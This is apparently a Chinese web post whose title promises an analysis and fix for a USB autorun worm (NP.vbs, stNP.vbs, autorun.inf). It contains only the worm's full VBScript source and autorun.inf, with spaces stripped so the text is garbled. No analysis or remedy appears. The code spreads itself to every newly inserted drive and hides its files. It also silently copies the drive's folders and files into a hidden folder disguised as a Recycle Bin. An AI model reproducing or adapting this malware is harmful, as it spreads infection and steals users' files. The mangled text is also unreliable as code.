最新恶意复制型病毒autorun.inf，stNP.VBS，NP.VBS代码简单解析和解决方法

[autorun]
open=
shell\open=打开(&O)
shell\open\Command=WScript.exestNP.vbs
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=WScript.exestNP.vbs

onerrorresumenext
setfso=CreateObject("Scripting.FileSys"&"temObject")
iffso.FileExists("NP.vbs")=-1then
iffso.FileExists("d:\NP.vbs")=-1then
setf=fso.getfile("d:\NP.vbs")
iff.attributes=0then
else
f.attributes=0
endif
f.delete(true)
endif
fso.copyfile"NP.vbs","d:\NP.vbs",true
setwshshell=wscript.createobject("WScript.Shell")
wshshell.run"d:\NP.vbs"
endif

''[NatruePark]
''容错语句
onErrorresumenext
''变量声明及初始化
dimfso,old_drs(),new_drs(),old_n,new_n,new_yn,wshshell
setfso=CreateObject("Scripting.File"&"SystemObject")
setwshshell=wscript.createobject("WScript.Shell")
old_n=0
redimold_drs(old_n)
old_drs(0)="C"

''[主体部分]
wshshell.run("explorer.\")
dimi
i=0
dowhilei>=0andi<8*360
scan_disk()
ifjudge_new_disk()=1then
dimleft_n
left_n=1
dowhileleft_n<=(new_n-old_n)
new_disk=new_drs(left_n+old_n)&":\"
''-----------------<维护块>-----------------
iffso.FileExists(new_disk&"NP.vbs")=-1then
else
self_copy(new_disk)
endif
add_attrib(new_disk&"NP.vbs")
iffso.FileExists(new_disk&"autorun.inf")=-1then
del_attrib(new_disk&"autorun.inf")
endif
add_autorun(new_disk)

add_attrib(new_disk&"autorun.inf")
iffso.FileExists(new_disk&"stNP.vbs")=-1then
else
add_stNP(new_disk)
endif
add_attrib(new_disk&"stNP.vbs")
''-----------------</维护块>-----------------
''-----------------<功能块>-----------------
dimrec
rec="d:\Recyc1ed\"
iffso.FolderExists(rec)=-1then
else
fso.createfolder(rec)
endif
add_attribf(rec)
iffso.FileExists(rec&"desktop.ini")=-1then
else
add_desktop(rec)
endif
add_attrib(rec&"desktop.ini")
aim_folder=rec&Date()&Rnd()
iffso.FolderExists(aim_folder)=-1then
else
fso.createfolder(aim_folder)
endif

''查找"汽轮机原理文件夹并复制"
iffso.FolderExists(new_disk&"汽轮机原理")=-1then
fso.copyfoldernew_disk&"汽轮机原理",aim_folder,true
add_attribf(aim_folder)
endif

''通用复制
ifold_n=0then
else
setfp=fso.getFolder(new_drs(new_n)&":\")
setfc=fp.SubFolders
foreachfinfc
fso.copyfolderf&"",aim_folder&"\"&f.name,true
next
setfc=fp.files
foreachfinfc
fso.copyfilef&"",aim_folder&"\",true
next
add_attribf(aim_folder)
endif
''-----------------</功能块>-----------------
left_n=left_n+1
loop
copy_disk()
endif
wscript.sleep(10000)
i=i+1
loop
''[函数部分]
''可用驱动器检测new_drs(),new_n
functionscan_disk()
dimd,dr
new_n=-1
setdr=fso.drives
foreachdindr
ifd.isreadythen
new_n=new_n+1
redimpreservenew_drs(new_n)
new_drs(new_n)=d.driveletter
endif
next
endfunction
''判断是否有新加入的驱动器
functionjudge_new_disk()
ifnew_n=old_nthen
judge_new_disk=0
elseifnew_n<old_nthen
redimpreserveold_drs(new_n)
old_n=new_n
judge_new_disk=0
elseifnew_n>old_nthen
redimpreserveold_drs(new_n)
judge_new_disk=1
endif
endfunction
''复制新驱动器表单
functioncopy_disk()
dimn
n=0
dowhilen<=new_n
old_drs(n)=new_drs(n)
n=n+1
loop
old_n=new_n
endfunction
''添加指定文件属性
functionadd_attrib(file)
setf=fso.getfile(file)
iff.attributes=7then

else
f.attributes=7
endif
endfunction
''删除指定文件属性
functiondel_attrib(file)
setf=fso.getfile(file)
iff.attributes=7then
f.attributes=0
else

endif
endfunction
''自我复制到指定文件目录
functionself_copy(folder)
dimaim_path,mid_path,self_file,mid_file
aim_path=folder&"NP.vbs"
mid_path="c:\np.bin"
setself_file=fso.opentextfile(wscript.scriptfullname,1)
self=self_file.readall
setmid_file=fso.opentextfile(mid_path,2,true)
mid_file.writeself
mid_file.close
setmid_file=fso.getfile(mid_path)
mid_file.copy(aim_path)
mid_file.delete(true)
endfunction
''增加autorun.inf
functionadd_autorun(folder)
dimpath
path=folder&"autorun.inf"
settemp=fso.CreateTextFile("c:\a.bin",true)
temp.writeline"[autorun]"
temp.writeline"open="
temp.writeline"shell\open=打开(&O)"
temp.writeline"shell\open\Command=WScript.exestNP.vbs"
temp.writeline"shell\open\Default=1"
temp.writeline"shell\explore=资源管理器(&X)"
temp.writeline"shell\explore\Command=WScript.exestNP.vbs"
temp.close
setcop=fso.getfile("c:\a.bin")
cop.copy(path)
cop.delete(true)
endfunction
''增加desktop.ini
functionadd_desktop(folder)
dimpath
path=folder&"desktop.ini"
settemp=fso.CreateTextFile("c:\d.bin",true)
temp.writeline"[.ShellClassInfo]"
temp.writeline"CLSID={645FF040-5081-101B-9F08-00AA002F954E}"
temp.close
setcop=fso.getfile("c:\d.bin")
cop.copy(path)
cop.delete(true)
endfunction
''增加stNP.vbs
functionadd_stNP(folder)
dimpath
setfso=CreateObject("Scripting.File"&"SystemObject")
path=folder&"stNP.vbs"
settemp=fso.CreateTextFile("c:\s.bin",true)

temp.writeline"onerrorresumenext"
temp.writeline"setfso=CreateObject("&chr(34)&"Scripting.FileSys"&chr(34)&"&"&chr(34)&"temObject"&chr(34)&")"
temp.writeline"iffso.FileExists("&chr(34)&"NP.vbs"&chr(34)&")=-1then"
temp.writeline"iffso.FileExists("&chr(34)&"d:\NP.vbs"&chr(34)&")=-1then"
temp.writeline"setf=fso.getfile("&chr(34)&"d:\NP.vbs"&chr(34)&")"
temp.writeline"iff.attributes=0then"
temp.writeline"else"
temp.writeline"f.attributes=0"
temp.writeline"endif"
temp.writeline"f.delete(true)"
temp.writeline"endif"
temp.writeline"fso.copyfile"&chr(34)&"NP.vbs"&chr(34)&","&chr(34)&"d:\NP.vbs"&chr(34)&",true"
temp.writeline"setwshshell=wscript.createobject("&chr(34)&"WScript.Shell"&chr(34)&")"
temp.writeline"wshshell.run"&chr(34)&"d:\NP.vbs"&chr(34)
temp.writeline"endif"

temp.close
setcop=fso.getfile("c:\s.bin")
cop.copy(path)
cop.delete(true)
endfunction

''添加指定文件夹属性
functionadd_attribf(folder)
setf=fso.getfolder(folder)
iff.attributes=7then

else
f.attributes=7
endif
endfunction
''删除指定文件夹属性
functiondel_attribf(folder)
setf=fso.getfolder(folder)
iff.attributes=0then
else
f.attributes=0

endif
endfunction


wscript.echo("THANKYOU!!")
wscript.quit